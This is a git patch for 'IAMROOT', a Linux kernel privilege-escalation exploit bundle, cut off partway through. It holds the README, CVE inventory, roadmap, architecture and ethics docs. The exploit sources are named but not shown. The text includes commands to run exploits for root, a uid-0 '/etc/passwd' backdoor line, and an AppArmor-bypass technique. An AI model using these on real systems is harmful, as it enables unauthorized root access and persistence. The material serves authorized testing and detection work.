From cf30b249debae07a6fc6d03afa64ac8841262550 Mon Sep 17 00:00:00 2001 From: KaraZajac Date: Sat, 16 May 2026 19:26:24 -0400 Subject: [PATCH] Initial skeleton: README, CVE inventory, roadmap, ARCH, ethics + copy_fail_family module absorbed from DIRTYFAIL --- .gitignore | 11 + CVES.md | 58 + LICENSE | 35 + Makefile | 26 + README.md | 99 ++ ROADMAP.md | 111 ++ docs/ARCHITECTURE.md | 119 ++ docs/ETHICS.md | 75 + .../_stubs/dirty_pipe_cve_2022_0847/MODULE.md | 47 + .../_stubs/entrybleed_cve_2023_0458/MODULE.md | 56 + modules/_stubs/fragnesia_TBD/MODULE.md | 27 + modules/copy_fail_family/MODULE.md | 1243 +++++++++++++++++ modules/copy_fail_family/Makefile | 93 ++ modules/copy_fail_family/NOTICE.md | 72 + modules/copy_fail_family/apparmor_bypass.c | 365 +++++ modules/copy_fail_family/apparmor_bypass.h | 113 ++ modules/copy_fail_family/backdoor.c | 382 +++++ modules/copy_fail_family/backdoor.h | 59 + modules/copy_fail_family/common.c | 362 +++++ modules/copy_fail_family/common.h | 197 +++ modules/copy_fail_family/copyfail.c | 451 ++++++ modules/copy_fail_family/copyfail.h | 33 + modules/copy_fail_family/copyfail_gcm.c | 634 +++++++++ modules/copy_fail_family/copyfail_gcm.h | 61 + modules/copy_fail_family/dirtyfail.c | 475 +++++++ modules/copy_fail_family/dirtyfrag_esp.c | 804 +++++++++++ modules/copy_fail_family/dirtyfrag_esp.h | 40 + modules/copy_fail_family/dirtyfrag_esp6.c | 698 +++++++++ modules/copy_fail_family/dirtyfrag_esp6.h | 46 + modules/copy_fail_family/dirtyfrag_rxrpc.c | 1069 ++++++++++++++ modules/copy_fail_family/dirtyfrag_rxrpc.h | 34 + modules/copy_fail_family/docs/DEFENDERS.md | 244 ++++ modules/copy_fail_family/docs/RESEARCH.md | 324 +++++ modules/copy_fail_family/exploit_su.c | 530 +++++++ modules/copy_fail_family/exploit_su.h | 56 + modules/copy_fail_family/fcrypt.c | 303 ++++ modules/copy_fail_family/fcrypt.h | 68 + modules/copy_fail_family/mitigate.c | 182 +++ modules/copy_fail_family/mitigate.h | 46 + modules/copy_fail_family/tests/test_aes_ecb.c | 101 ++ modules/copy_fail_family/tests/test_fcrypt.c | 84 ++ .../copy_fail_family/tools/99-dirtyfail.rules | 100 ++ .../copy_fail_family/tools/dirtyfail-check.sh | 181 +++ .../tools/dirtyfail-container-escape.sh | 149 ++ .../tools/exploit_su_aarch64.S | 73 + 45 files changed, 10336 insertions(+) create mode 100644 .gitignore create mode 100644 CVES.md create mode 100644 LICENSE create mode 100644 Makefile create mode 100644 README.md create mode 100644 ROADMAP.md create mode 100644 docs/ARCHITECTURE.md create mode 100644 docs/ETHICS.md create mode 100644 modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md create mode 100644 modules/_stubs/entrybleed_cve_2023_0458/MODULE.md create mode 100644 modules/_stubs/fragnesia_TBD/MODULE.md create mode 100644 modules/copy_fail_family/MODULE.md create mode 100644 modules/copy_fail_family/Makefile create mode 100644 modules/copy_fail_family/NOTICE.md create mode 100644 modules/copy_fail_family/apparmor_bypass.c create mode 100644 modules/copy_fail_family/apparmor_bypass.h create mode 100644 modules/copy_fail_family/backdoor.c create mode 100644 modules/copy_fail_family/backdoor.h create mode 100644 modules/copy_fail_family/common.c create mode 100644 modules/copy_fail_family/common.h create mode 100644 modules/copy_fail_family/copyfail.c create mode 100644 modules/copy_fail_family/copyfail.h create mode 100644 modules/copy_fail_family/copyfail_gcm.c create mode 100644 modules/copy_fail_family/copyfail_gcm.h create mode 100644 modules/copy_fail_family/dirtyfail.c create mode 100644 modules/copy_fail_family/dirtyfrag_esp.c create mode 100644 modules/copy_fail_family/dirtyfrag_esp.h create mode 100644 modules/copy_fail_family/dirtyfrag_esp6.c create mode 100644 modules/copy_fail_family/dirtyfrag_esp6.h create mode 100644 modules/copy_fail_family/dirtyfrag_rxrpc.c create mode 100644 modules/copy_fail_family/dirtyfrag_rxrpc.h create mode 100644 modules/copy_fail_family/docs/DEFENDERS.md create mode 100644 modules/copy_fail_family/docs/RESEARCH.md create mode 100644 modules/copy_fail_family/exploit_su.c create mode 100644 modules/copy_fail_family/exploit_su.h create mode 100644 modules/copy_fail_family/fcrypt.c create mode 100644 modules/copy_fail_family/fcrypt.h create mode 100644 modules/copy_fail_family/mitigate.c create mode 100644 modules/copy_fail_family/mitigate.h create mode 100644 modules/copy_fail_family/tests/test_aes_ecb.c create mode 100644 modules/copy_fail_family/tests/test_fcrypt.c create mode 100644 modules/copy_fail_family/tools/99-dirtyfail.rules create mode 100755 modules/copy_fail_family/tools/dirtyfail-check.sh create mode 100755 modules/copy_fail_family/tools/dirtyfail-container-escape.sh create mode 100644 modules/copy_fail_family/tools/exploit_su_aarch64.S diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..0b72099 --- /dev/null +++ b/.gitignore @@ -0,0 +1,11 @@ +build/ +*.o +*.a +*.so +*.dSYM/ +modules/*/build/ +modules/*/dirtyfail +modules/*/iamroot +.vscode/ +.idea/ +*.swp diff --git a/CVES.md b/CVES.md new file mode 100644 index 0000000..560227b --- /dev/null +++ b/CVES.md @@ -0,0 +1,58 @@ +# CVE inventory + +The curated list of CVEs IAMROOT exploits, with patch status and +module status. Updated as new modules land or as upstream patches +ship. + +Status legend: + +- 🟒 **WORKING** β€” module verified to land root on a vulnerable host +- 🟑 **PARTIAL** β€” module detects + exploits on some distros, not all +- πŸ”΅ **DETECT-ONLY** β€” module fingerprints presence/absence but no + exploit (yet). Useful for blue teams. +- βšͺ **PLANNED** β€” stub exists, work not started +- πŸ”΄ **DEPRECATED** β€” fully patched everywhere relevant; kept for + historical reference only + +## Inventory + +| CVE | Name | Class | First patched | IAMROOT module | Status | Notes | +|---|---|---|---|---|---|---| +| CVE-2026-31431 | Copy Fail (algif_aead `authencesn` page-cache write) | LPE (page-cache write β†’ /etc/passwd) | mainline 2026-04-22 | `copy_fail_family/copy_fail` | 🟒 | Verified on Ubuntu 26.04, Alma 9, Debian 13. Full AppArmor bypass. | +| CVE-2026-43284 (v4) | Dirty Frag β€” IPv4 xfrm-ESP page-cache write | LPE (same primitive shape as Copy Fail, different trigger) | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp` | 🟒 | Full PoC + active-probe scan | +| CVE-2026-43284 (v6) | Dirty Frag β€” IPv6 xfrm-ESP (`esp6`) | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_esp6` | 🟒 | V6 STORE shift auto-calibrated per kernel build | +| CVE-2026-43500 | Dirty Frag β€” RxRPC page-cache write | LPE | mainline 2026-05-XX | `copy_fail_family/dirty_frag_rxrpc` | 🟒 | | +| (variant, no CVE) | Copy Fail GCM variant β€” xfrm-ESP `rfc4106(gcm(aes))` page-cache write | LPE | n/a | `copy_fail_family/copy_fail_gcm` | 🟒 | Sibling primitive, same fix | +| CVE-2022-0847 | Dirty Pipe β€” pipe `PIPE_BUF_FLAG_CAN_MERGE` write | LPE (arbitrary file write into page cache) | mainline 2022-02-23 | `_stubs/dirty_pipe_cve_2022_0847` | βšͺ | Stub. Public PoCs exist; bundling for completeness. Affects ≀5.16.11, ≀5.15.25, ≀5.10.102 | +| CVE-2023-0458 | EntryBleed β€” KPTI prefetchnta KASLR bypass | INFO-LEAK (kbase) | mainline (partial mitigations only) | `_stubs/entrybleed_cve_2023_0458` | βšͺ | Stub. Used as STAGE-1 leak brick, not a standalone LPE. Works on lts-6.12.88 (empirical 5/5). | +| CVE-2026-31402 | NFS replay-cache heap overflow | LPE (NFS server) | mainline 2026-04-03 | β€” | βšͺ | Candidate. Different audience (NFS servers) β€” TBD whether in-scope. | +| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | βšͺ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns β€” may or may not be in-scope depending on target environment. | + +## Pipeline for additions + +1. Bug must be **patched in upstream mainline** (we don't bundle + 0-days) +2. Either **CVE-assigned** or has clear advisory/patch reference +3. Affects a kernel version range with realistic deployment footprint + (we don't bundle exploits for kernels nobody runs) +4. PoC works on at least one distro+kernel in our CI matrix +5. Detection signature(s) shipped alongside the exploit + +## Patch-status tracking + +Each module's `kernel-range.json` (planned) declares the affected +range. CI verifies the exploit fails on the first-patched version +and succeeds below it. When a distro backports the fix into a kernel +version below the original first-patched, the matrix updates and +the relevant distro drops out of the "WORKING" list for that module. + +## Why we exclude some things + +- **0-days the maintainer found themselves**: those go through + responsible disclosure first, then enter IAMROOT after upstream patch +- **kCTF VRP submissions in flight**: same as above; disclosure + before bundling +- **Hardware-specific side channels** (Spectre/Meltdown variants): + out of scope; not page-cache or process-isolation primitives +- **Container-escape only**: unless it cleanly chains to host-root, + out of scope (separate tool space) diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..ad3759e --- /dev/null +++ b/LICENSE @@ -0,0 +1,35 @@ +MIT License + +Copyright (c) 2026 DIRTYFAIL contributors + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + +--- + +DISCLAIMER FOR SECURITY RESEARCH SOFTWARE + +This software is provided for authorized security research, education, and +defensive testing only. By using this software, you agree that: + +1. You will only run the exploit modes (--exploit-*) on systems you own or + are explicitly authorized to test. +2. You understand that the exploit modes modify the kernel page cache copy + of /etc/passwd and that this is a privilege-escalation operation while + it persists. The on-disk file is not modified. +3. The authors disclaim all liability for any misuse of this software. diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..23daf31 --- /dev/null +++ b/Makefile @@ -0,0 +1,26 @@ +# IAMROOT top-level Makefile +# +# Phase 0 (current): defers to modules/copy_fail_family/Makefile. +# Phase 1: real dispatcher build that links all modules into one +# binary. See ROADMAP.md. + +MODULES := copy_fail_family + +.PHONY: all clean $(MODULES) + +all: $(MODULES) + +$(MODULES): + $(MAKE) -C modules/$@ + +clean: + @for m in $(MODULES); do \ + $(MAKE) -C modules/$$m clean; \ + done + rm -rf build/ + +# Convenience: scan the host using the absorbed DIRTYFAIL-as-module +# until Phase 1's real dispatcher lands. +scan: + @modules/copy_fail_family/dirtyfail --scan 2>/dev/null || \ + (echo "Build the copy_fail module first: make copy_fail_family" && exit 1) diff --git a/README.md b/README.md new file mode 100644 index 0000000..39fcecd --- /dev/null +++ b/README.md @@ -0,0 +1,99 @@ +# IAMROOT + +> A curated, actively-maintained corpus of Linux kernel LPE exploits β€” +> bundled with their detection signatures, patch status, and version +> ranges. Run it on a system you own (or are authorized to test) and +> it tells you which historical and recent CVEs that system is still +> vulnerable to, and β€” with explicit confirmation β€” gets you root. + +``` + β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β• + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ + β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• +``` + +> ⚠️ **Authorized testing only.** IAMROOT is a research and red-team +> tool. By using it you assert you have explicit authorization to test +> the target system. See [`docs/ETHICS.md`](docs/ETHICS.md). + +## What this is + +Most Linux LPE references are dead repos, broken PoCs, or single-CVE +deep-dives. **IAMROOT is a living corpus**: each CVE that lands here +is empirically verified to work on the kernels it claims to target, +CI-tested across a distro matrix, and ships with the detection +signatures defenders need to spot it in their environment. + +The same binary covers offense and defense: + +- `iamroot --scan` β€” fingerprint the host, report which bundled CVEs + apply, and which are blocked by patches/config/LSM +- `iamroot --exploit ` β€” run the named exploit (with `--i-know` + authorization gate) +- `iamroot --detect-rules` β€” dump auditd / sigma / yara rules for + every bundled CVE so blue teams can drop them into their tooling +- `iamroot --mitigate` β€” apply temporary mitigations for CVEs the + host is vulnerable to (sysctl knobs, module blacklists, etc.) + +## Status + +**Active. Bootstrap phase as of 2026-05-16.** First module +(`copy_fail_family`) absorbed from the standalone DIRTYFAIL project +and is verified working end-to-end on Ubuntu 26.04 + Alma 9 + Debian +13 with full AppArmor bypass + container escape demo + persistent +backdoor mode. + +See [`CVES.md`](CVES.md) for the full curated CVE list with patch +status. See [`ROADMAP.md`](ROADMAP.md) for the next planned modules. + +## Why this exists + +The Linux kernel privilege-escalation space is fragmented: + +- **`linux-exploit-suggester` / `linpeas`**: suggest applicable + exploits, don't run them +- **`auto-root-exploit` / `kernelpop`**: bundle exploits, but largely + stale, no CI, no defensive signatures +- **Per-CVE single-PoC repos**: usually one author, often abandoned + within months of release, often only one distro + +IAMROOT's bet is that there's room for a single curated bundle that +(1) actively maintains a small set of high-quality exploits across a +multi-distro matrix, and (2) ships detection rules alongside each +exploit so the same project serves both red and blue teams. + +## Architecture + +Each CVE (or tightly-related family) is a **module** under `modules/`. +Modules export a standard interface: `detect()`, `exploit()`, +`mitigate()`, `cleanup()`, plus metadata describing affected kernel +ranges, distro coverage, and CI test matrix. + +Shared infrastructure (AppArmor bypass, su-exploitation primitives, +fingerprinting, common utilities) lives in `core/`. + +See [`docs/ARCHITECTURE.md`](docs/ARCHITECTURE.md) for the +module-loader design and how to add a new CVE. + +## Build & run + +```bash +make # build all modules +sudo ./iamroot --scan # what's this box vulnerable to? +sudo ./iamroot --scan --json # machine-readable output for CI/SOC pipelines +sudo ./iamroot --detect-rules --format=sigma > rules.yml +sudo ./iamroot --exploit copy_fail --i-know # actually run an exploit +``` + +## Acknowledgments + +Each module credits the original CVE reporter and PoC author in its +`NOTICE.md`. IAMROOT is the bundling and bookkeeping layer; the +research credit belongs to the people who found the bugs. + +## License + +MIT β€” see [`LICENSE`](LICENSE). diff --git a/ROADMAP.md b/ROADMAP.md new file mode 100644 index 0000000..9c884b0 --- /dev/null +++ b/ROADMAP.md @@ -0,0 +1,111 @@ +# Roadmap + +What's coming next, in priority order. Dates are aspirational, not +commitments. + +## Phase 0 β€” Bootstrap (DONE as of 2026-05-16) + +- [x] Repo structure (modules/, core/, docs/, tools/, tests/) +- [x] Absorbed DIRTYFAIL as the first module + (`modules/copy_fail_family/`) +- [x] Top-level README, CVES.md, ROADMAP.md, docs/ARCHITECTURE.md, + docs/ETHICS.md +- [x] LICENSE (MIT) +- [x] Private GitHub repo + +## Phase 1 β€” Make the bundling real (next session) + +- [ ] Top-level `iamroot` dispatcher CLI (`iamroot.c`) β€” module + registry, fingerprint, route to module's detect/exploit +- [ ] Module interface header (`core/module.h`) β€” standard + `iamroot_module` struct each module exports +- [ ] Refactor `modules/copy_fail_family/` internals to expose the + standard module interface +- [ ] Extract shared code into `core/`: `apparmor_bypass.c`, + `exploit_su.c`, `common.c`, `fcrypt.c` (currently duplicated + under the absorbed DIRTYFAIL tree) +- [ ] Top-level `Makefile` that builds all modules into one binary +- [ ] Smoke test: `iamroot --scan --json` on Ubuntu 26.04 + produces sensible output + +## Phase 2 β€” Add Dirty Pipe (CVE-2022-0847) + +Public PoC, well-understood, useful for completeness β€” IAMROOT +without Dirty Pipe is incomplete as a "historical bundle." Affects +kernels ≀5.16.11/≀5.15.25/≀5.10.102 so coverage is older +deployments (worth bundling β€” many production boxes still run +these). + +- [ ] `modules/dirty_pipe_cve_2022_0847/` β€” exploit + detect + range + metadata +- [ ] Test matrix: Ubuntu 20.04 (vulnerable kernels), Debian 11 + (vulnerable kernels), modern kernels (immune β€” should detect + as patched) +- [ ] Detection rules: auditd splice/pipe write patterns + +## Phase 3 β€” Add EntryBleed (CVE-2023-0458) as stage-1 leak brick + +EntryBleed is **not a standalone LPE**. It's a **kbase leak +primitive** that other modules can chain. Bundle it because: + +- Stage-1 of any future "build-your-own LPE" workflow +- Detection rules for KPTI side-channel attempts are useful for + defenders +- Already works empirically on lts-6.12.88 (verified 2026-05-16) + +- [ ] `modules/entrybleed_cve_2023_0458/` β€” leak primitive + + detect-mitigations +- [ ] Exposed as a library helper: other modules can call + `entrybleed_leak_kbase()` when they need a kbase + +## Phase 4 β€” CI matrix + +- [ ] Distro+kernel VM matrix in GitHub Actions (Ubuntu 20.04 / + 22.04 / 24.04 / 26.04, Debian 11 / 12 / 13, Alma 8 / 9 / 10, + Fedora 39 / 40 / 41) +- [ ] Each module's exploit runs against matched-vulnerable VMs and + MUST land root; runs against patched VMs and MUST fail at + detect step +- [ ] Nightly run; failures open issues automatically + +## Phase 5 β€” Detection signature export + +- [ ] `iamroot --detect-rules --format=sigma` β€” Sigma rules per CVE +- [ ] `--format=yara` β€” YARA rules for static detection of exploit + binaries +- [ ] `--format=auditd` β€” auditd `.rules` snippets +- [ ] `--format=falco` β€” Falco rule snippets +- [ ] Sample SOC playbook in `docs/DETECTION_PLAYBOOK.md` + +## Phase 6 β€” Mitigation mode + +- [ ] `iamroot --mitigate` walks the host's vulnerabilities, applies + temporary sysctl / module-blacklist / LSM workarounds +- [ ] Per-CVE rollback procedure if the mitigation breaks something +- [ ] Idempotent: running twice is safe + +## Phase 7+ β€” More modules + +Backfill of historical and recent LPEs as time allows: + +- [ ] **CVE-2021-3493** β€” overlayfs nested-userns LPE +- [ ] **CVE-2021-4034** β€” Pwnkit (pkexec env handling) +- [ ] **CVE-2022-2588** β€” net/sched route4 dead UAF +- [ ] **CVE-2023-2008** β€” vmwgfx OOB write +- [ ] **CVE-2024-1086** β€” netfilter nf_tables UAF +- [ ] Fragnesia (if it lands as a CVE) +- [ ] Anything we ourselves disclose β€” bundled AFTER upstream patch + ships (responsible-disclosure-first) + +## Non-goals + +- **No 0-day shipment.** Everything in IAMROOT is post-patch. +- **No automated mass-targeting.** No host-list mode. No automatic + pivoting. +- **No persistence beyond `--exploit-backdoor`'s + `/etc/passwd` overwrite**, which is overt and easily detected by + any auditd rule we ship ourselves. Persistence-as-evasion is out + of scope. +- **No container-runtime escapes** unless they cleanly chain to + host-root. +- **No Windows / macOS / non-Linux targets.** Focus is the moat. diff --git a/docs/ARCHITECTURE.md b/docs/ARCHITECTURE.md new file mode 100644 index 0000000..91159b4 --- /dev/null +++ b/docs/ARCHITECTURE.md @@ -0,0 +1,119 @@ +# Architecture + +## Module model + +Each CVE (or tightly-related family of CVEs sharing a primitive) is +a **module** under `modules/`. A module is a self-contained +exploit + detection + metadata bundle that exports a standard +interface to the top-level dispatcher. + +### Module layout + +``` +modules// +β”œβ”€β”€ MODULE.md # Human-readable writeup of the bug +β”œβ”€β”€ NOTICE.md # Credits to original researcher +β”œβ”€β”€ kernel-range.json # Machine-readable affected kernels +β”œβ”€β”€ module.c # Implements iamroot_module interface +β”œβ”€β”€ module.h +β”œβ”€β”€ detect/ +β”‚ β”œβ”€β”€ auditd.rules # blue team detection +β”‚ β”œβ”€β”€ sigma.yml +β”‚ └── yara.yara +β”œβ”€β”€ src/ # exploit internals +└── tests/ # per-module tests (run in CI matrix) +``` + +### `iamroot_module` interface (planned, Phase 1) + +```c +struct iamroot_module { + const char *name; /* "copy_fail" */ + const char *cve; /* "CVE-2026-31431" */ + const char *summary; /* one-line description */ + + /* Return 1 if host appears vulnerable, 0 if patched/immune, + * -1 if probe couldn't run. May call entrybleed_leak_kbase() + * etc. from core/ if a leak primitive is needed. */ + int (*detect)(struct iamroot_host *host); + + /* Run the exploit. Caller has already passed the + * authorization gate. Returns 0 on root acquired, + * nonzero on failure. */ + int (*exploit)(struct iamroot_host *host, struct iamroot_opts *opts); + + /* Apply a runtime mitigation for this CVE (sysctl, module + * blacklist, etc.). Returns 0 on success. NULL if no + * mitigation is offered. */ + int (*mitigate)(struct iamroot_host *host); + + /* Undo --exploit-backdoor or --mitigate side effects. */ + int (*cleanup)(struct iamroot_host *host); + + /* Affected kernel version range, distros covered, etc. */ + const struct iamroot_kernel_range *ranges; + size_t n_ranges; +}; +``` + +Modules register themselves at link time via a constructor-attribute +table. The top-level `iamroot` binary iterates the registry on each +invocation. + +## Shared `core/` + +Code that more than one module needs lives in `core/`: + +- `core/common.c` β€” fingerprinting (kernel version, distro, LSM, + hardening flags), logging, error handling +- `core/apparmor_bypass.c` β€” Ubuntu's + `apparmor_restrict_unprivileged_userns=1` defeat via + `change_onexec("crun")` re-exec +- `core/exploit_su.c` β€” once we have page-cache-write or + /etc/passwd-overwrite, this is the shared "drop to root shell" + helper +- `core/fcrypt.c` β€” file-encryption helpers used by multiple modules +- `core/entrybleed.c` (planned, Phase 3) β€” kbase leak primitive that + any module needing KASLR-defeat can call + +## Top-level dispatcher + +`iamroot.c` (planned, Phase 1) is the CLI entry point. Responsibilities: + +1. Parse args (`--scan`, `--exploit `, `--mitigate`, + `--detect-rules`, `--cleanup`, etc.) +2. Fingerprint the host +3. For `--scan`: iterate module registry, call each module's + `detect()`, emit table of results +4. For `--exploit `: locate module, gate behind `--i-know`, + call its `exploit()` +5. For `--detect-rules`: walk module registry, concatenate detection + files in the requested format + +## CI matrix + +`.github/workflows/ci.yml` (planned, Phase 4) runs each module's +test against a matrix of distro Γ— kernel VMs. Each test asserts: + +- on a vulnerable VM: `detect()` returns 1, `exploit()` returns 0 + and produces uid=0 +- on a patched VM: `detect()` returns 0, `exploit()` either refuses + or fails gracefully + +Failures on a previously-working matrix entry open an issue +automatically (likely cause: distro shipped a backport that broke +the module). + +## Adding a new CVE + +1. `git checkout -b add-cve-XXXX-NNNN` +2. `cp -r modules/_stubs/_template modules/` +3. Fill in `MODULE.md`, `NOTICE.md`, `kernel-range.json` +4. Implement `module.c` exposing the `iamroot_module` interface +5. Ship at least one detection rule under `detect/` +6. Add tests under `tests/` +7. PR. CI runs the matrix. If it lands root on at least one + vulnerable matched VM AND fails cleanly on a patched VM, it + merges. + +See `docs/module-template.md` (planned) for the per-module checklist. diff --git a/docs/ETHICS.md b/docs/ETHICS.md new file mode 100644 index 0000000..bef00a0 --- /dev/null +++ b/docs/ETHICS.md @@ -0,0 +1,75 @@ +# Ethics, scope, and acceptable use + +## Acceptable use + +IAMROOT is intended for: + +1. **Authorized red-team / pentest engagements.** You have a written + scope, signed by someone who can authorize testing on the target + systems. +2. **Defensive teams testing detection coverage.** You're using + IAMROOT in a lab to verify your auditd/sigma/falco rules fire as + expected. +3. **Security researchers studying historical LPEs.** You're reading + the code, running it in your own VMs, learning how the primitives + actually work end-to-end. +4. **Build engineers verifying patch coverage.** You're running + `iamroot --scan` against your fleet's golden images to confirm + each known CVE shows up as patched. + +## Not-acceptable use + +IAMROOT should not be used: + +1. On systems you do not own and have not been authorized to test +2. As part of unauthorized access to any system +3. To exfiltrate data or maintain persistence on a system after a + testing engagement is complete +4. To build a worm, scanner, or any tool that automatically targets + systems at scale without per-target authorization + +By using IAMROOT you assert that your use falls into the +acceptable-use cases above. + +## Why this is publishable + +Every CVE bundled in IAMROOT is: + +- **Already patched** in upstream mainline kernel +- **Already published** in NVD or distro security trackers +- **Already covered** by existing public PoCs + +IAMROOT does not introduce new offensive capability. It bundles, +documents, and CI-tests what is already public β€” and ships the +detection signatures defenders need to spot it. + +The bundling itself raises the baseline competence required to +benefit from this code: a script kiddie can already find and run +single-CVE PoCs on GitHub. Bundling improves quality and CI coverage +without meaningfully changing offensive capability, while providing +real defensive value through the detection-rule exports. + +## Disclosure + +If you find a bug in IAMROOT itself (incorrect detection, broken +exploit on a kernel where it should work, missing a backport in the +range metadata): file a public GitHub issue. + +If you find a **new 0-day kernel LPE while inspired by reading +IAMROOT code**: please disclose it responsibly to the kernel +security team (`security@kernel.org`) and the affected distros +*before* writing a public PoC. Once upstream patch ships and a CVE +is assigned, IAMROOT will gladly accept the module. + +## Persistence and stealth are out of scope + +`--exploit-backdoor` in the copy_fail module overwrites a +`/etc/passwd` line with a `uid=0` shell account. This is **overt**: + +- The username is `iamroot` (was `dirtyfail`) β€” instantly identifiable +- It's covered by the auditd rules IAMROOT ships +- `--cleanup-backdoor` restores the original line + +If you're looking for evasion, persistence, or stealth: not here. +Use a real C2 framework if you have authorization to do so. IAMROOT +stops at "demonstrate that the bug works." diff --git a/modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md b/modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md new file mode 100644 index 0000000..417a660 --- /dev/null +++ b/modules/_stubs/dirty_pipe_cve_2022_0847/MODULE.md @@ -0,0 +1,47 @@ +# Dirty Pipe β€” CVE-2022-0847 + +> βšͺ **PLANNED** module. See [`../../ROADMAP.md`](../../ROADMAP.md) +> Phase 2. + +## Summary + +Pipe-buffer `PIPE_BUF_FLAG_CAN_MERGE` was incorrectly inherited by +`copy_page_to_iter_pipe()` and `push_pipe()` paths, allowing an +unprivileged user to write into the page cache of any file readable +by them. + +## Affected kernels + +- ≀ 5.16.11 +- ≀ 5.15.25 LTS +- ≀ 5.10.102 LTS + +## Upstream patch + +`9d2231c5d74e13b2a0546fee6737ee4446017903` ("lib/iov_iter: initialize +"flags" in new pipe_buffer") + +## Why this module is here + +Even in 2026, many production deployments still run vulnerable +kernels (RHEL 7/8, older Ubuntu LTS, embedded). Bundling Dirty Pipe +makes IAMROOT useful as a "historical sweep" tool on long-tail +systems. + +## Implementation plan + +- C exploit ported from public PoCs (credit upstream authors in + `NOTICE.md` when implemented) +- `detect()`: kernel version check + `/proc/version` parse + test + for fixed-version backports +- `exploit()`: writes `iamroot::0:0:dirtypipe:/:/bin/bash` into + `/etc/passwd`, then `su iamroot` β€” same shape as copy_fail's + backdoor mode +- Detection rules: auditd on splice() calls + pipe write patterns, + filesystem audit on `/etc/passwd` modification by non-root + +## Not started yet + +Pick this up after Phase 1 (module-interface refactor of the +copy_fail family) so this module can use the standard +`iamroot_module` shape from the start. diff --git a/modules/_stubs/entrybleed_cve_2023_0458/MODULE.md b/modules/_stubs/entrybleed_cve_2023_0458/MODULE.md new file mode 100644 index 0000000..dbeacb2 --- /dev/null +++ b/modules/_stubs/entrybleed_cve_2023_0458/MODULE.md @@ -0,0 +1,56 @@ +# EntryBleed β€” CVE-2023-0458 + +> βšͺ **PLANNED** stub module. See [`../../ROADMAP.md`](../../ROADMAP.md) +> Phase 3. + +## Summary + +KPTI's user-space-mapped entry trampoline is detectable via +`prefetchnta` timing, leaking the kernel base address (defeats +KASLR). Universal across modern x86_64 kernels with KPTI; only +partial mitigations have shipped upstream. + +## Why this is here + +EntryBleed is **not a standalone LPE**. It's a **stage-1 leak +primitive** that future LPE modules can call when they need a kbase. +Bundling it as a module: + +1. Lets other modules `#include "core/entrybleed.h"` and call + `entrybleed_leak_kbase()` when they need KASLR defeat +2. Ships defensive detection rules for prefetchnta-timing-attack + patterns (useful for hardened environments) +3. Documents the technique with a clear writeup so users + understand what "stage-1" means in the broader chain + +## Empirical status on recent kernels + +Verified 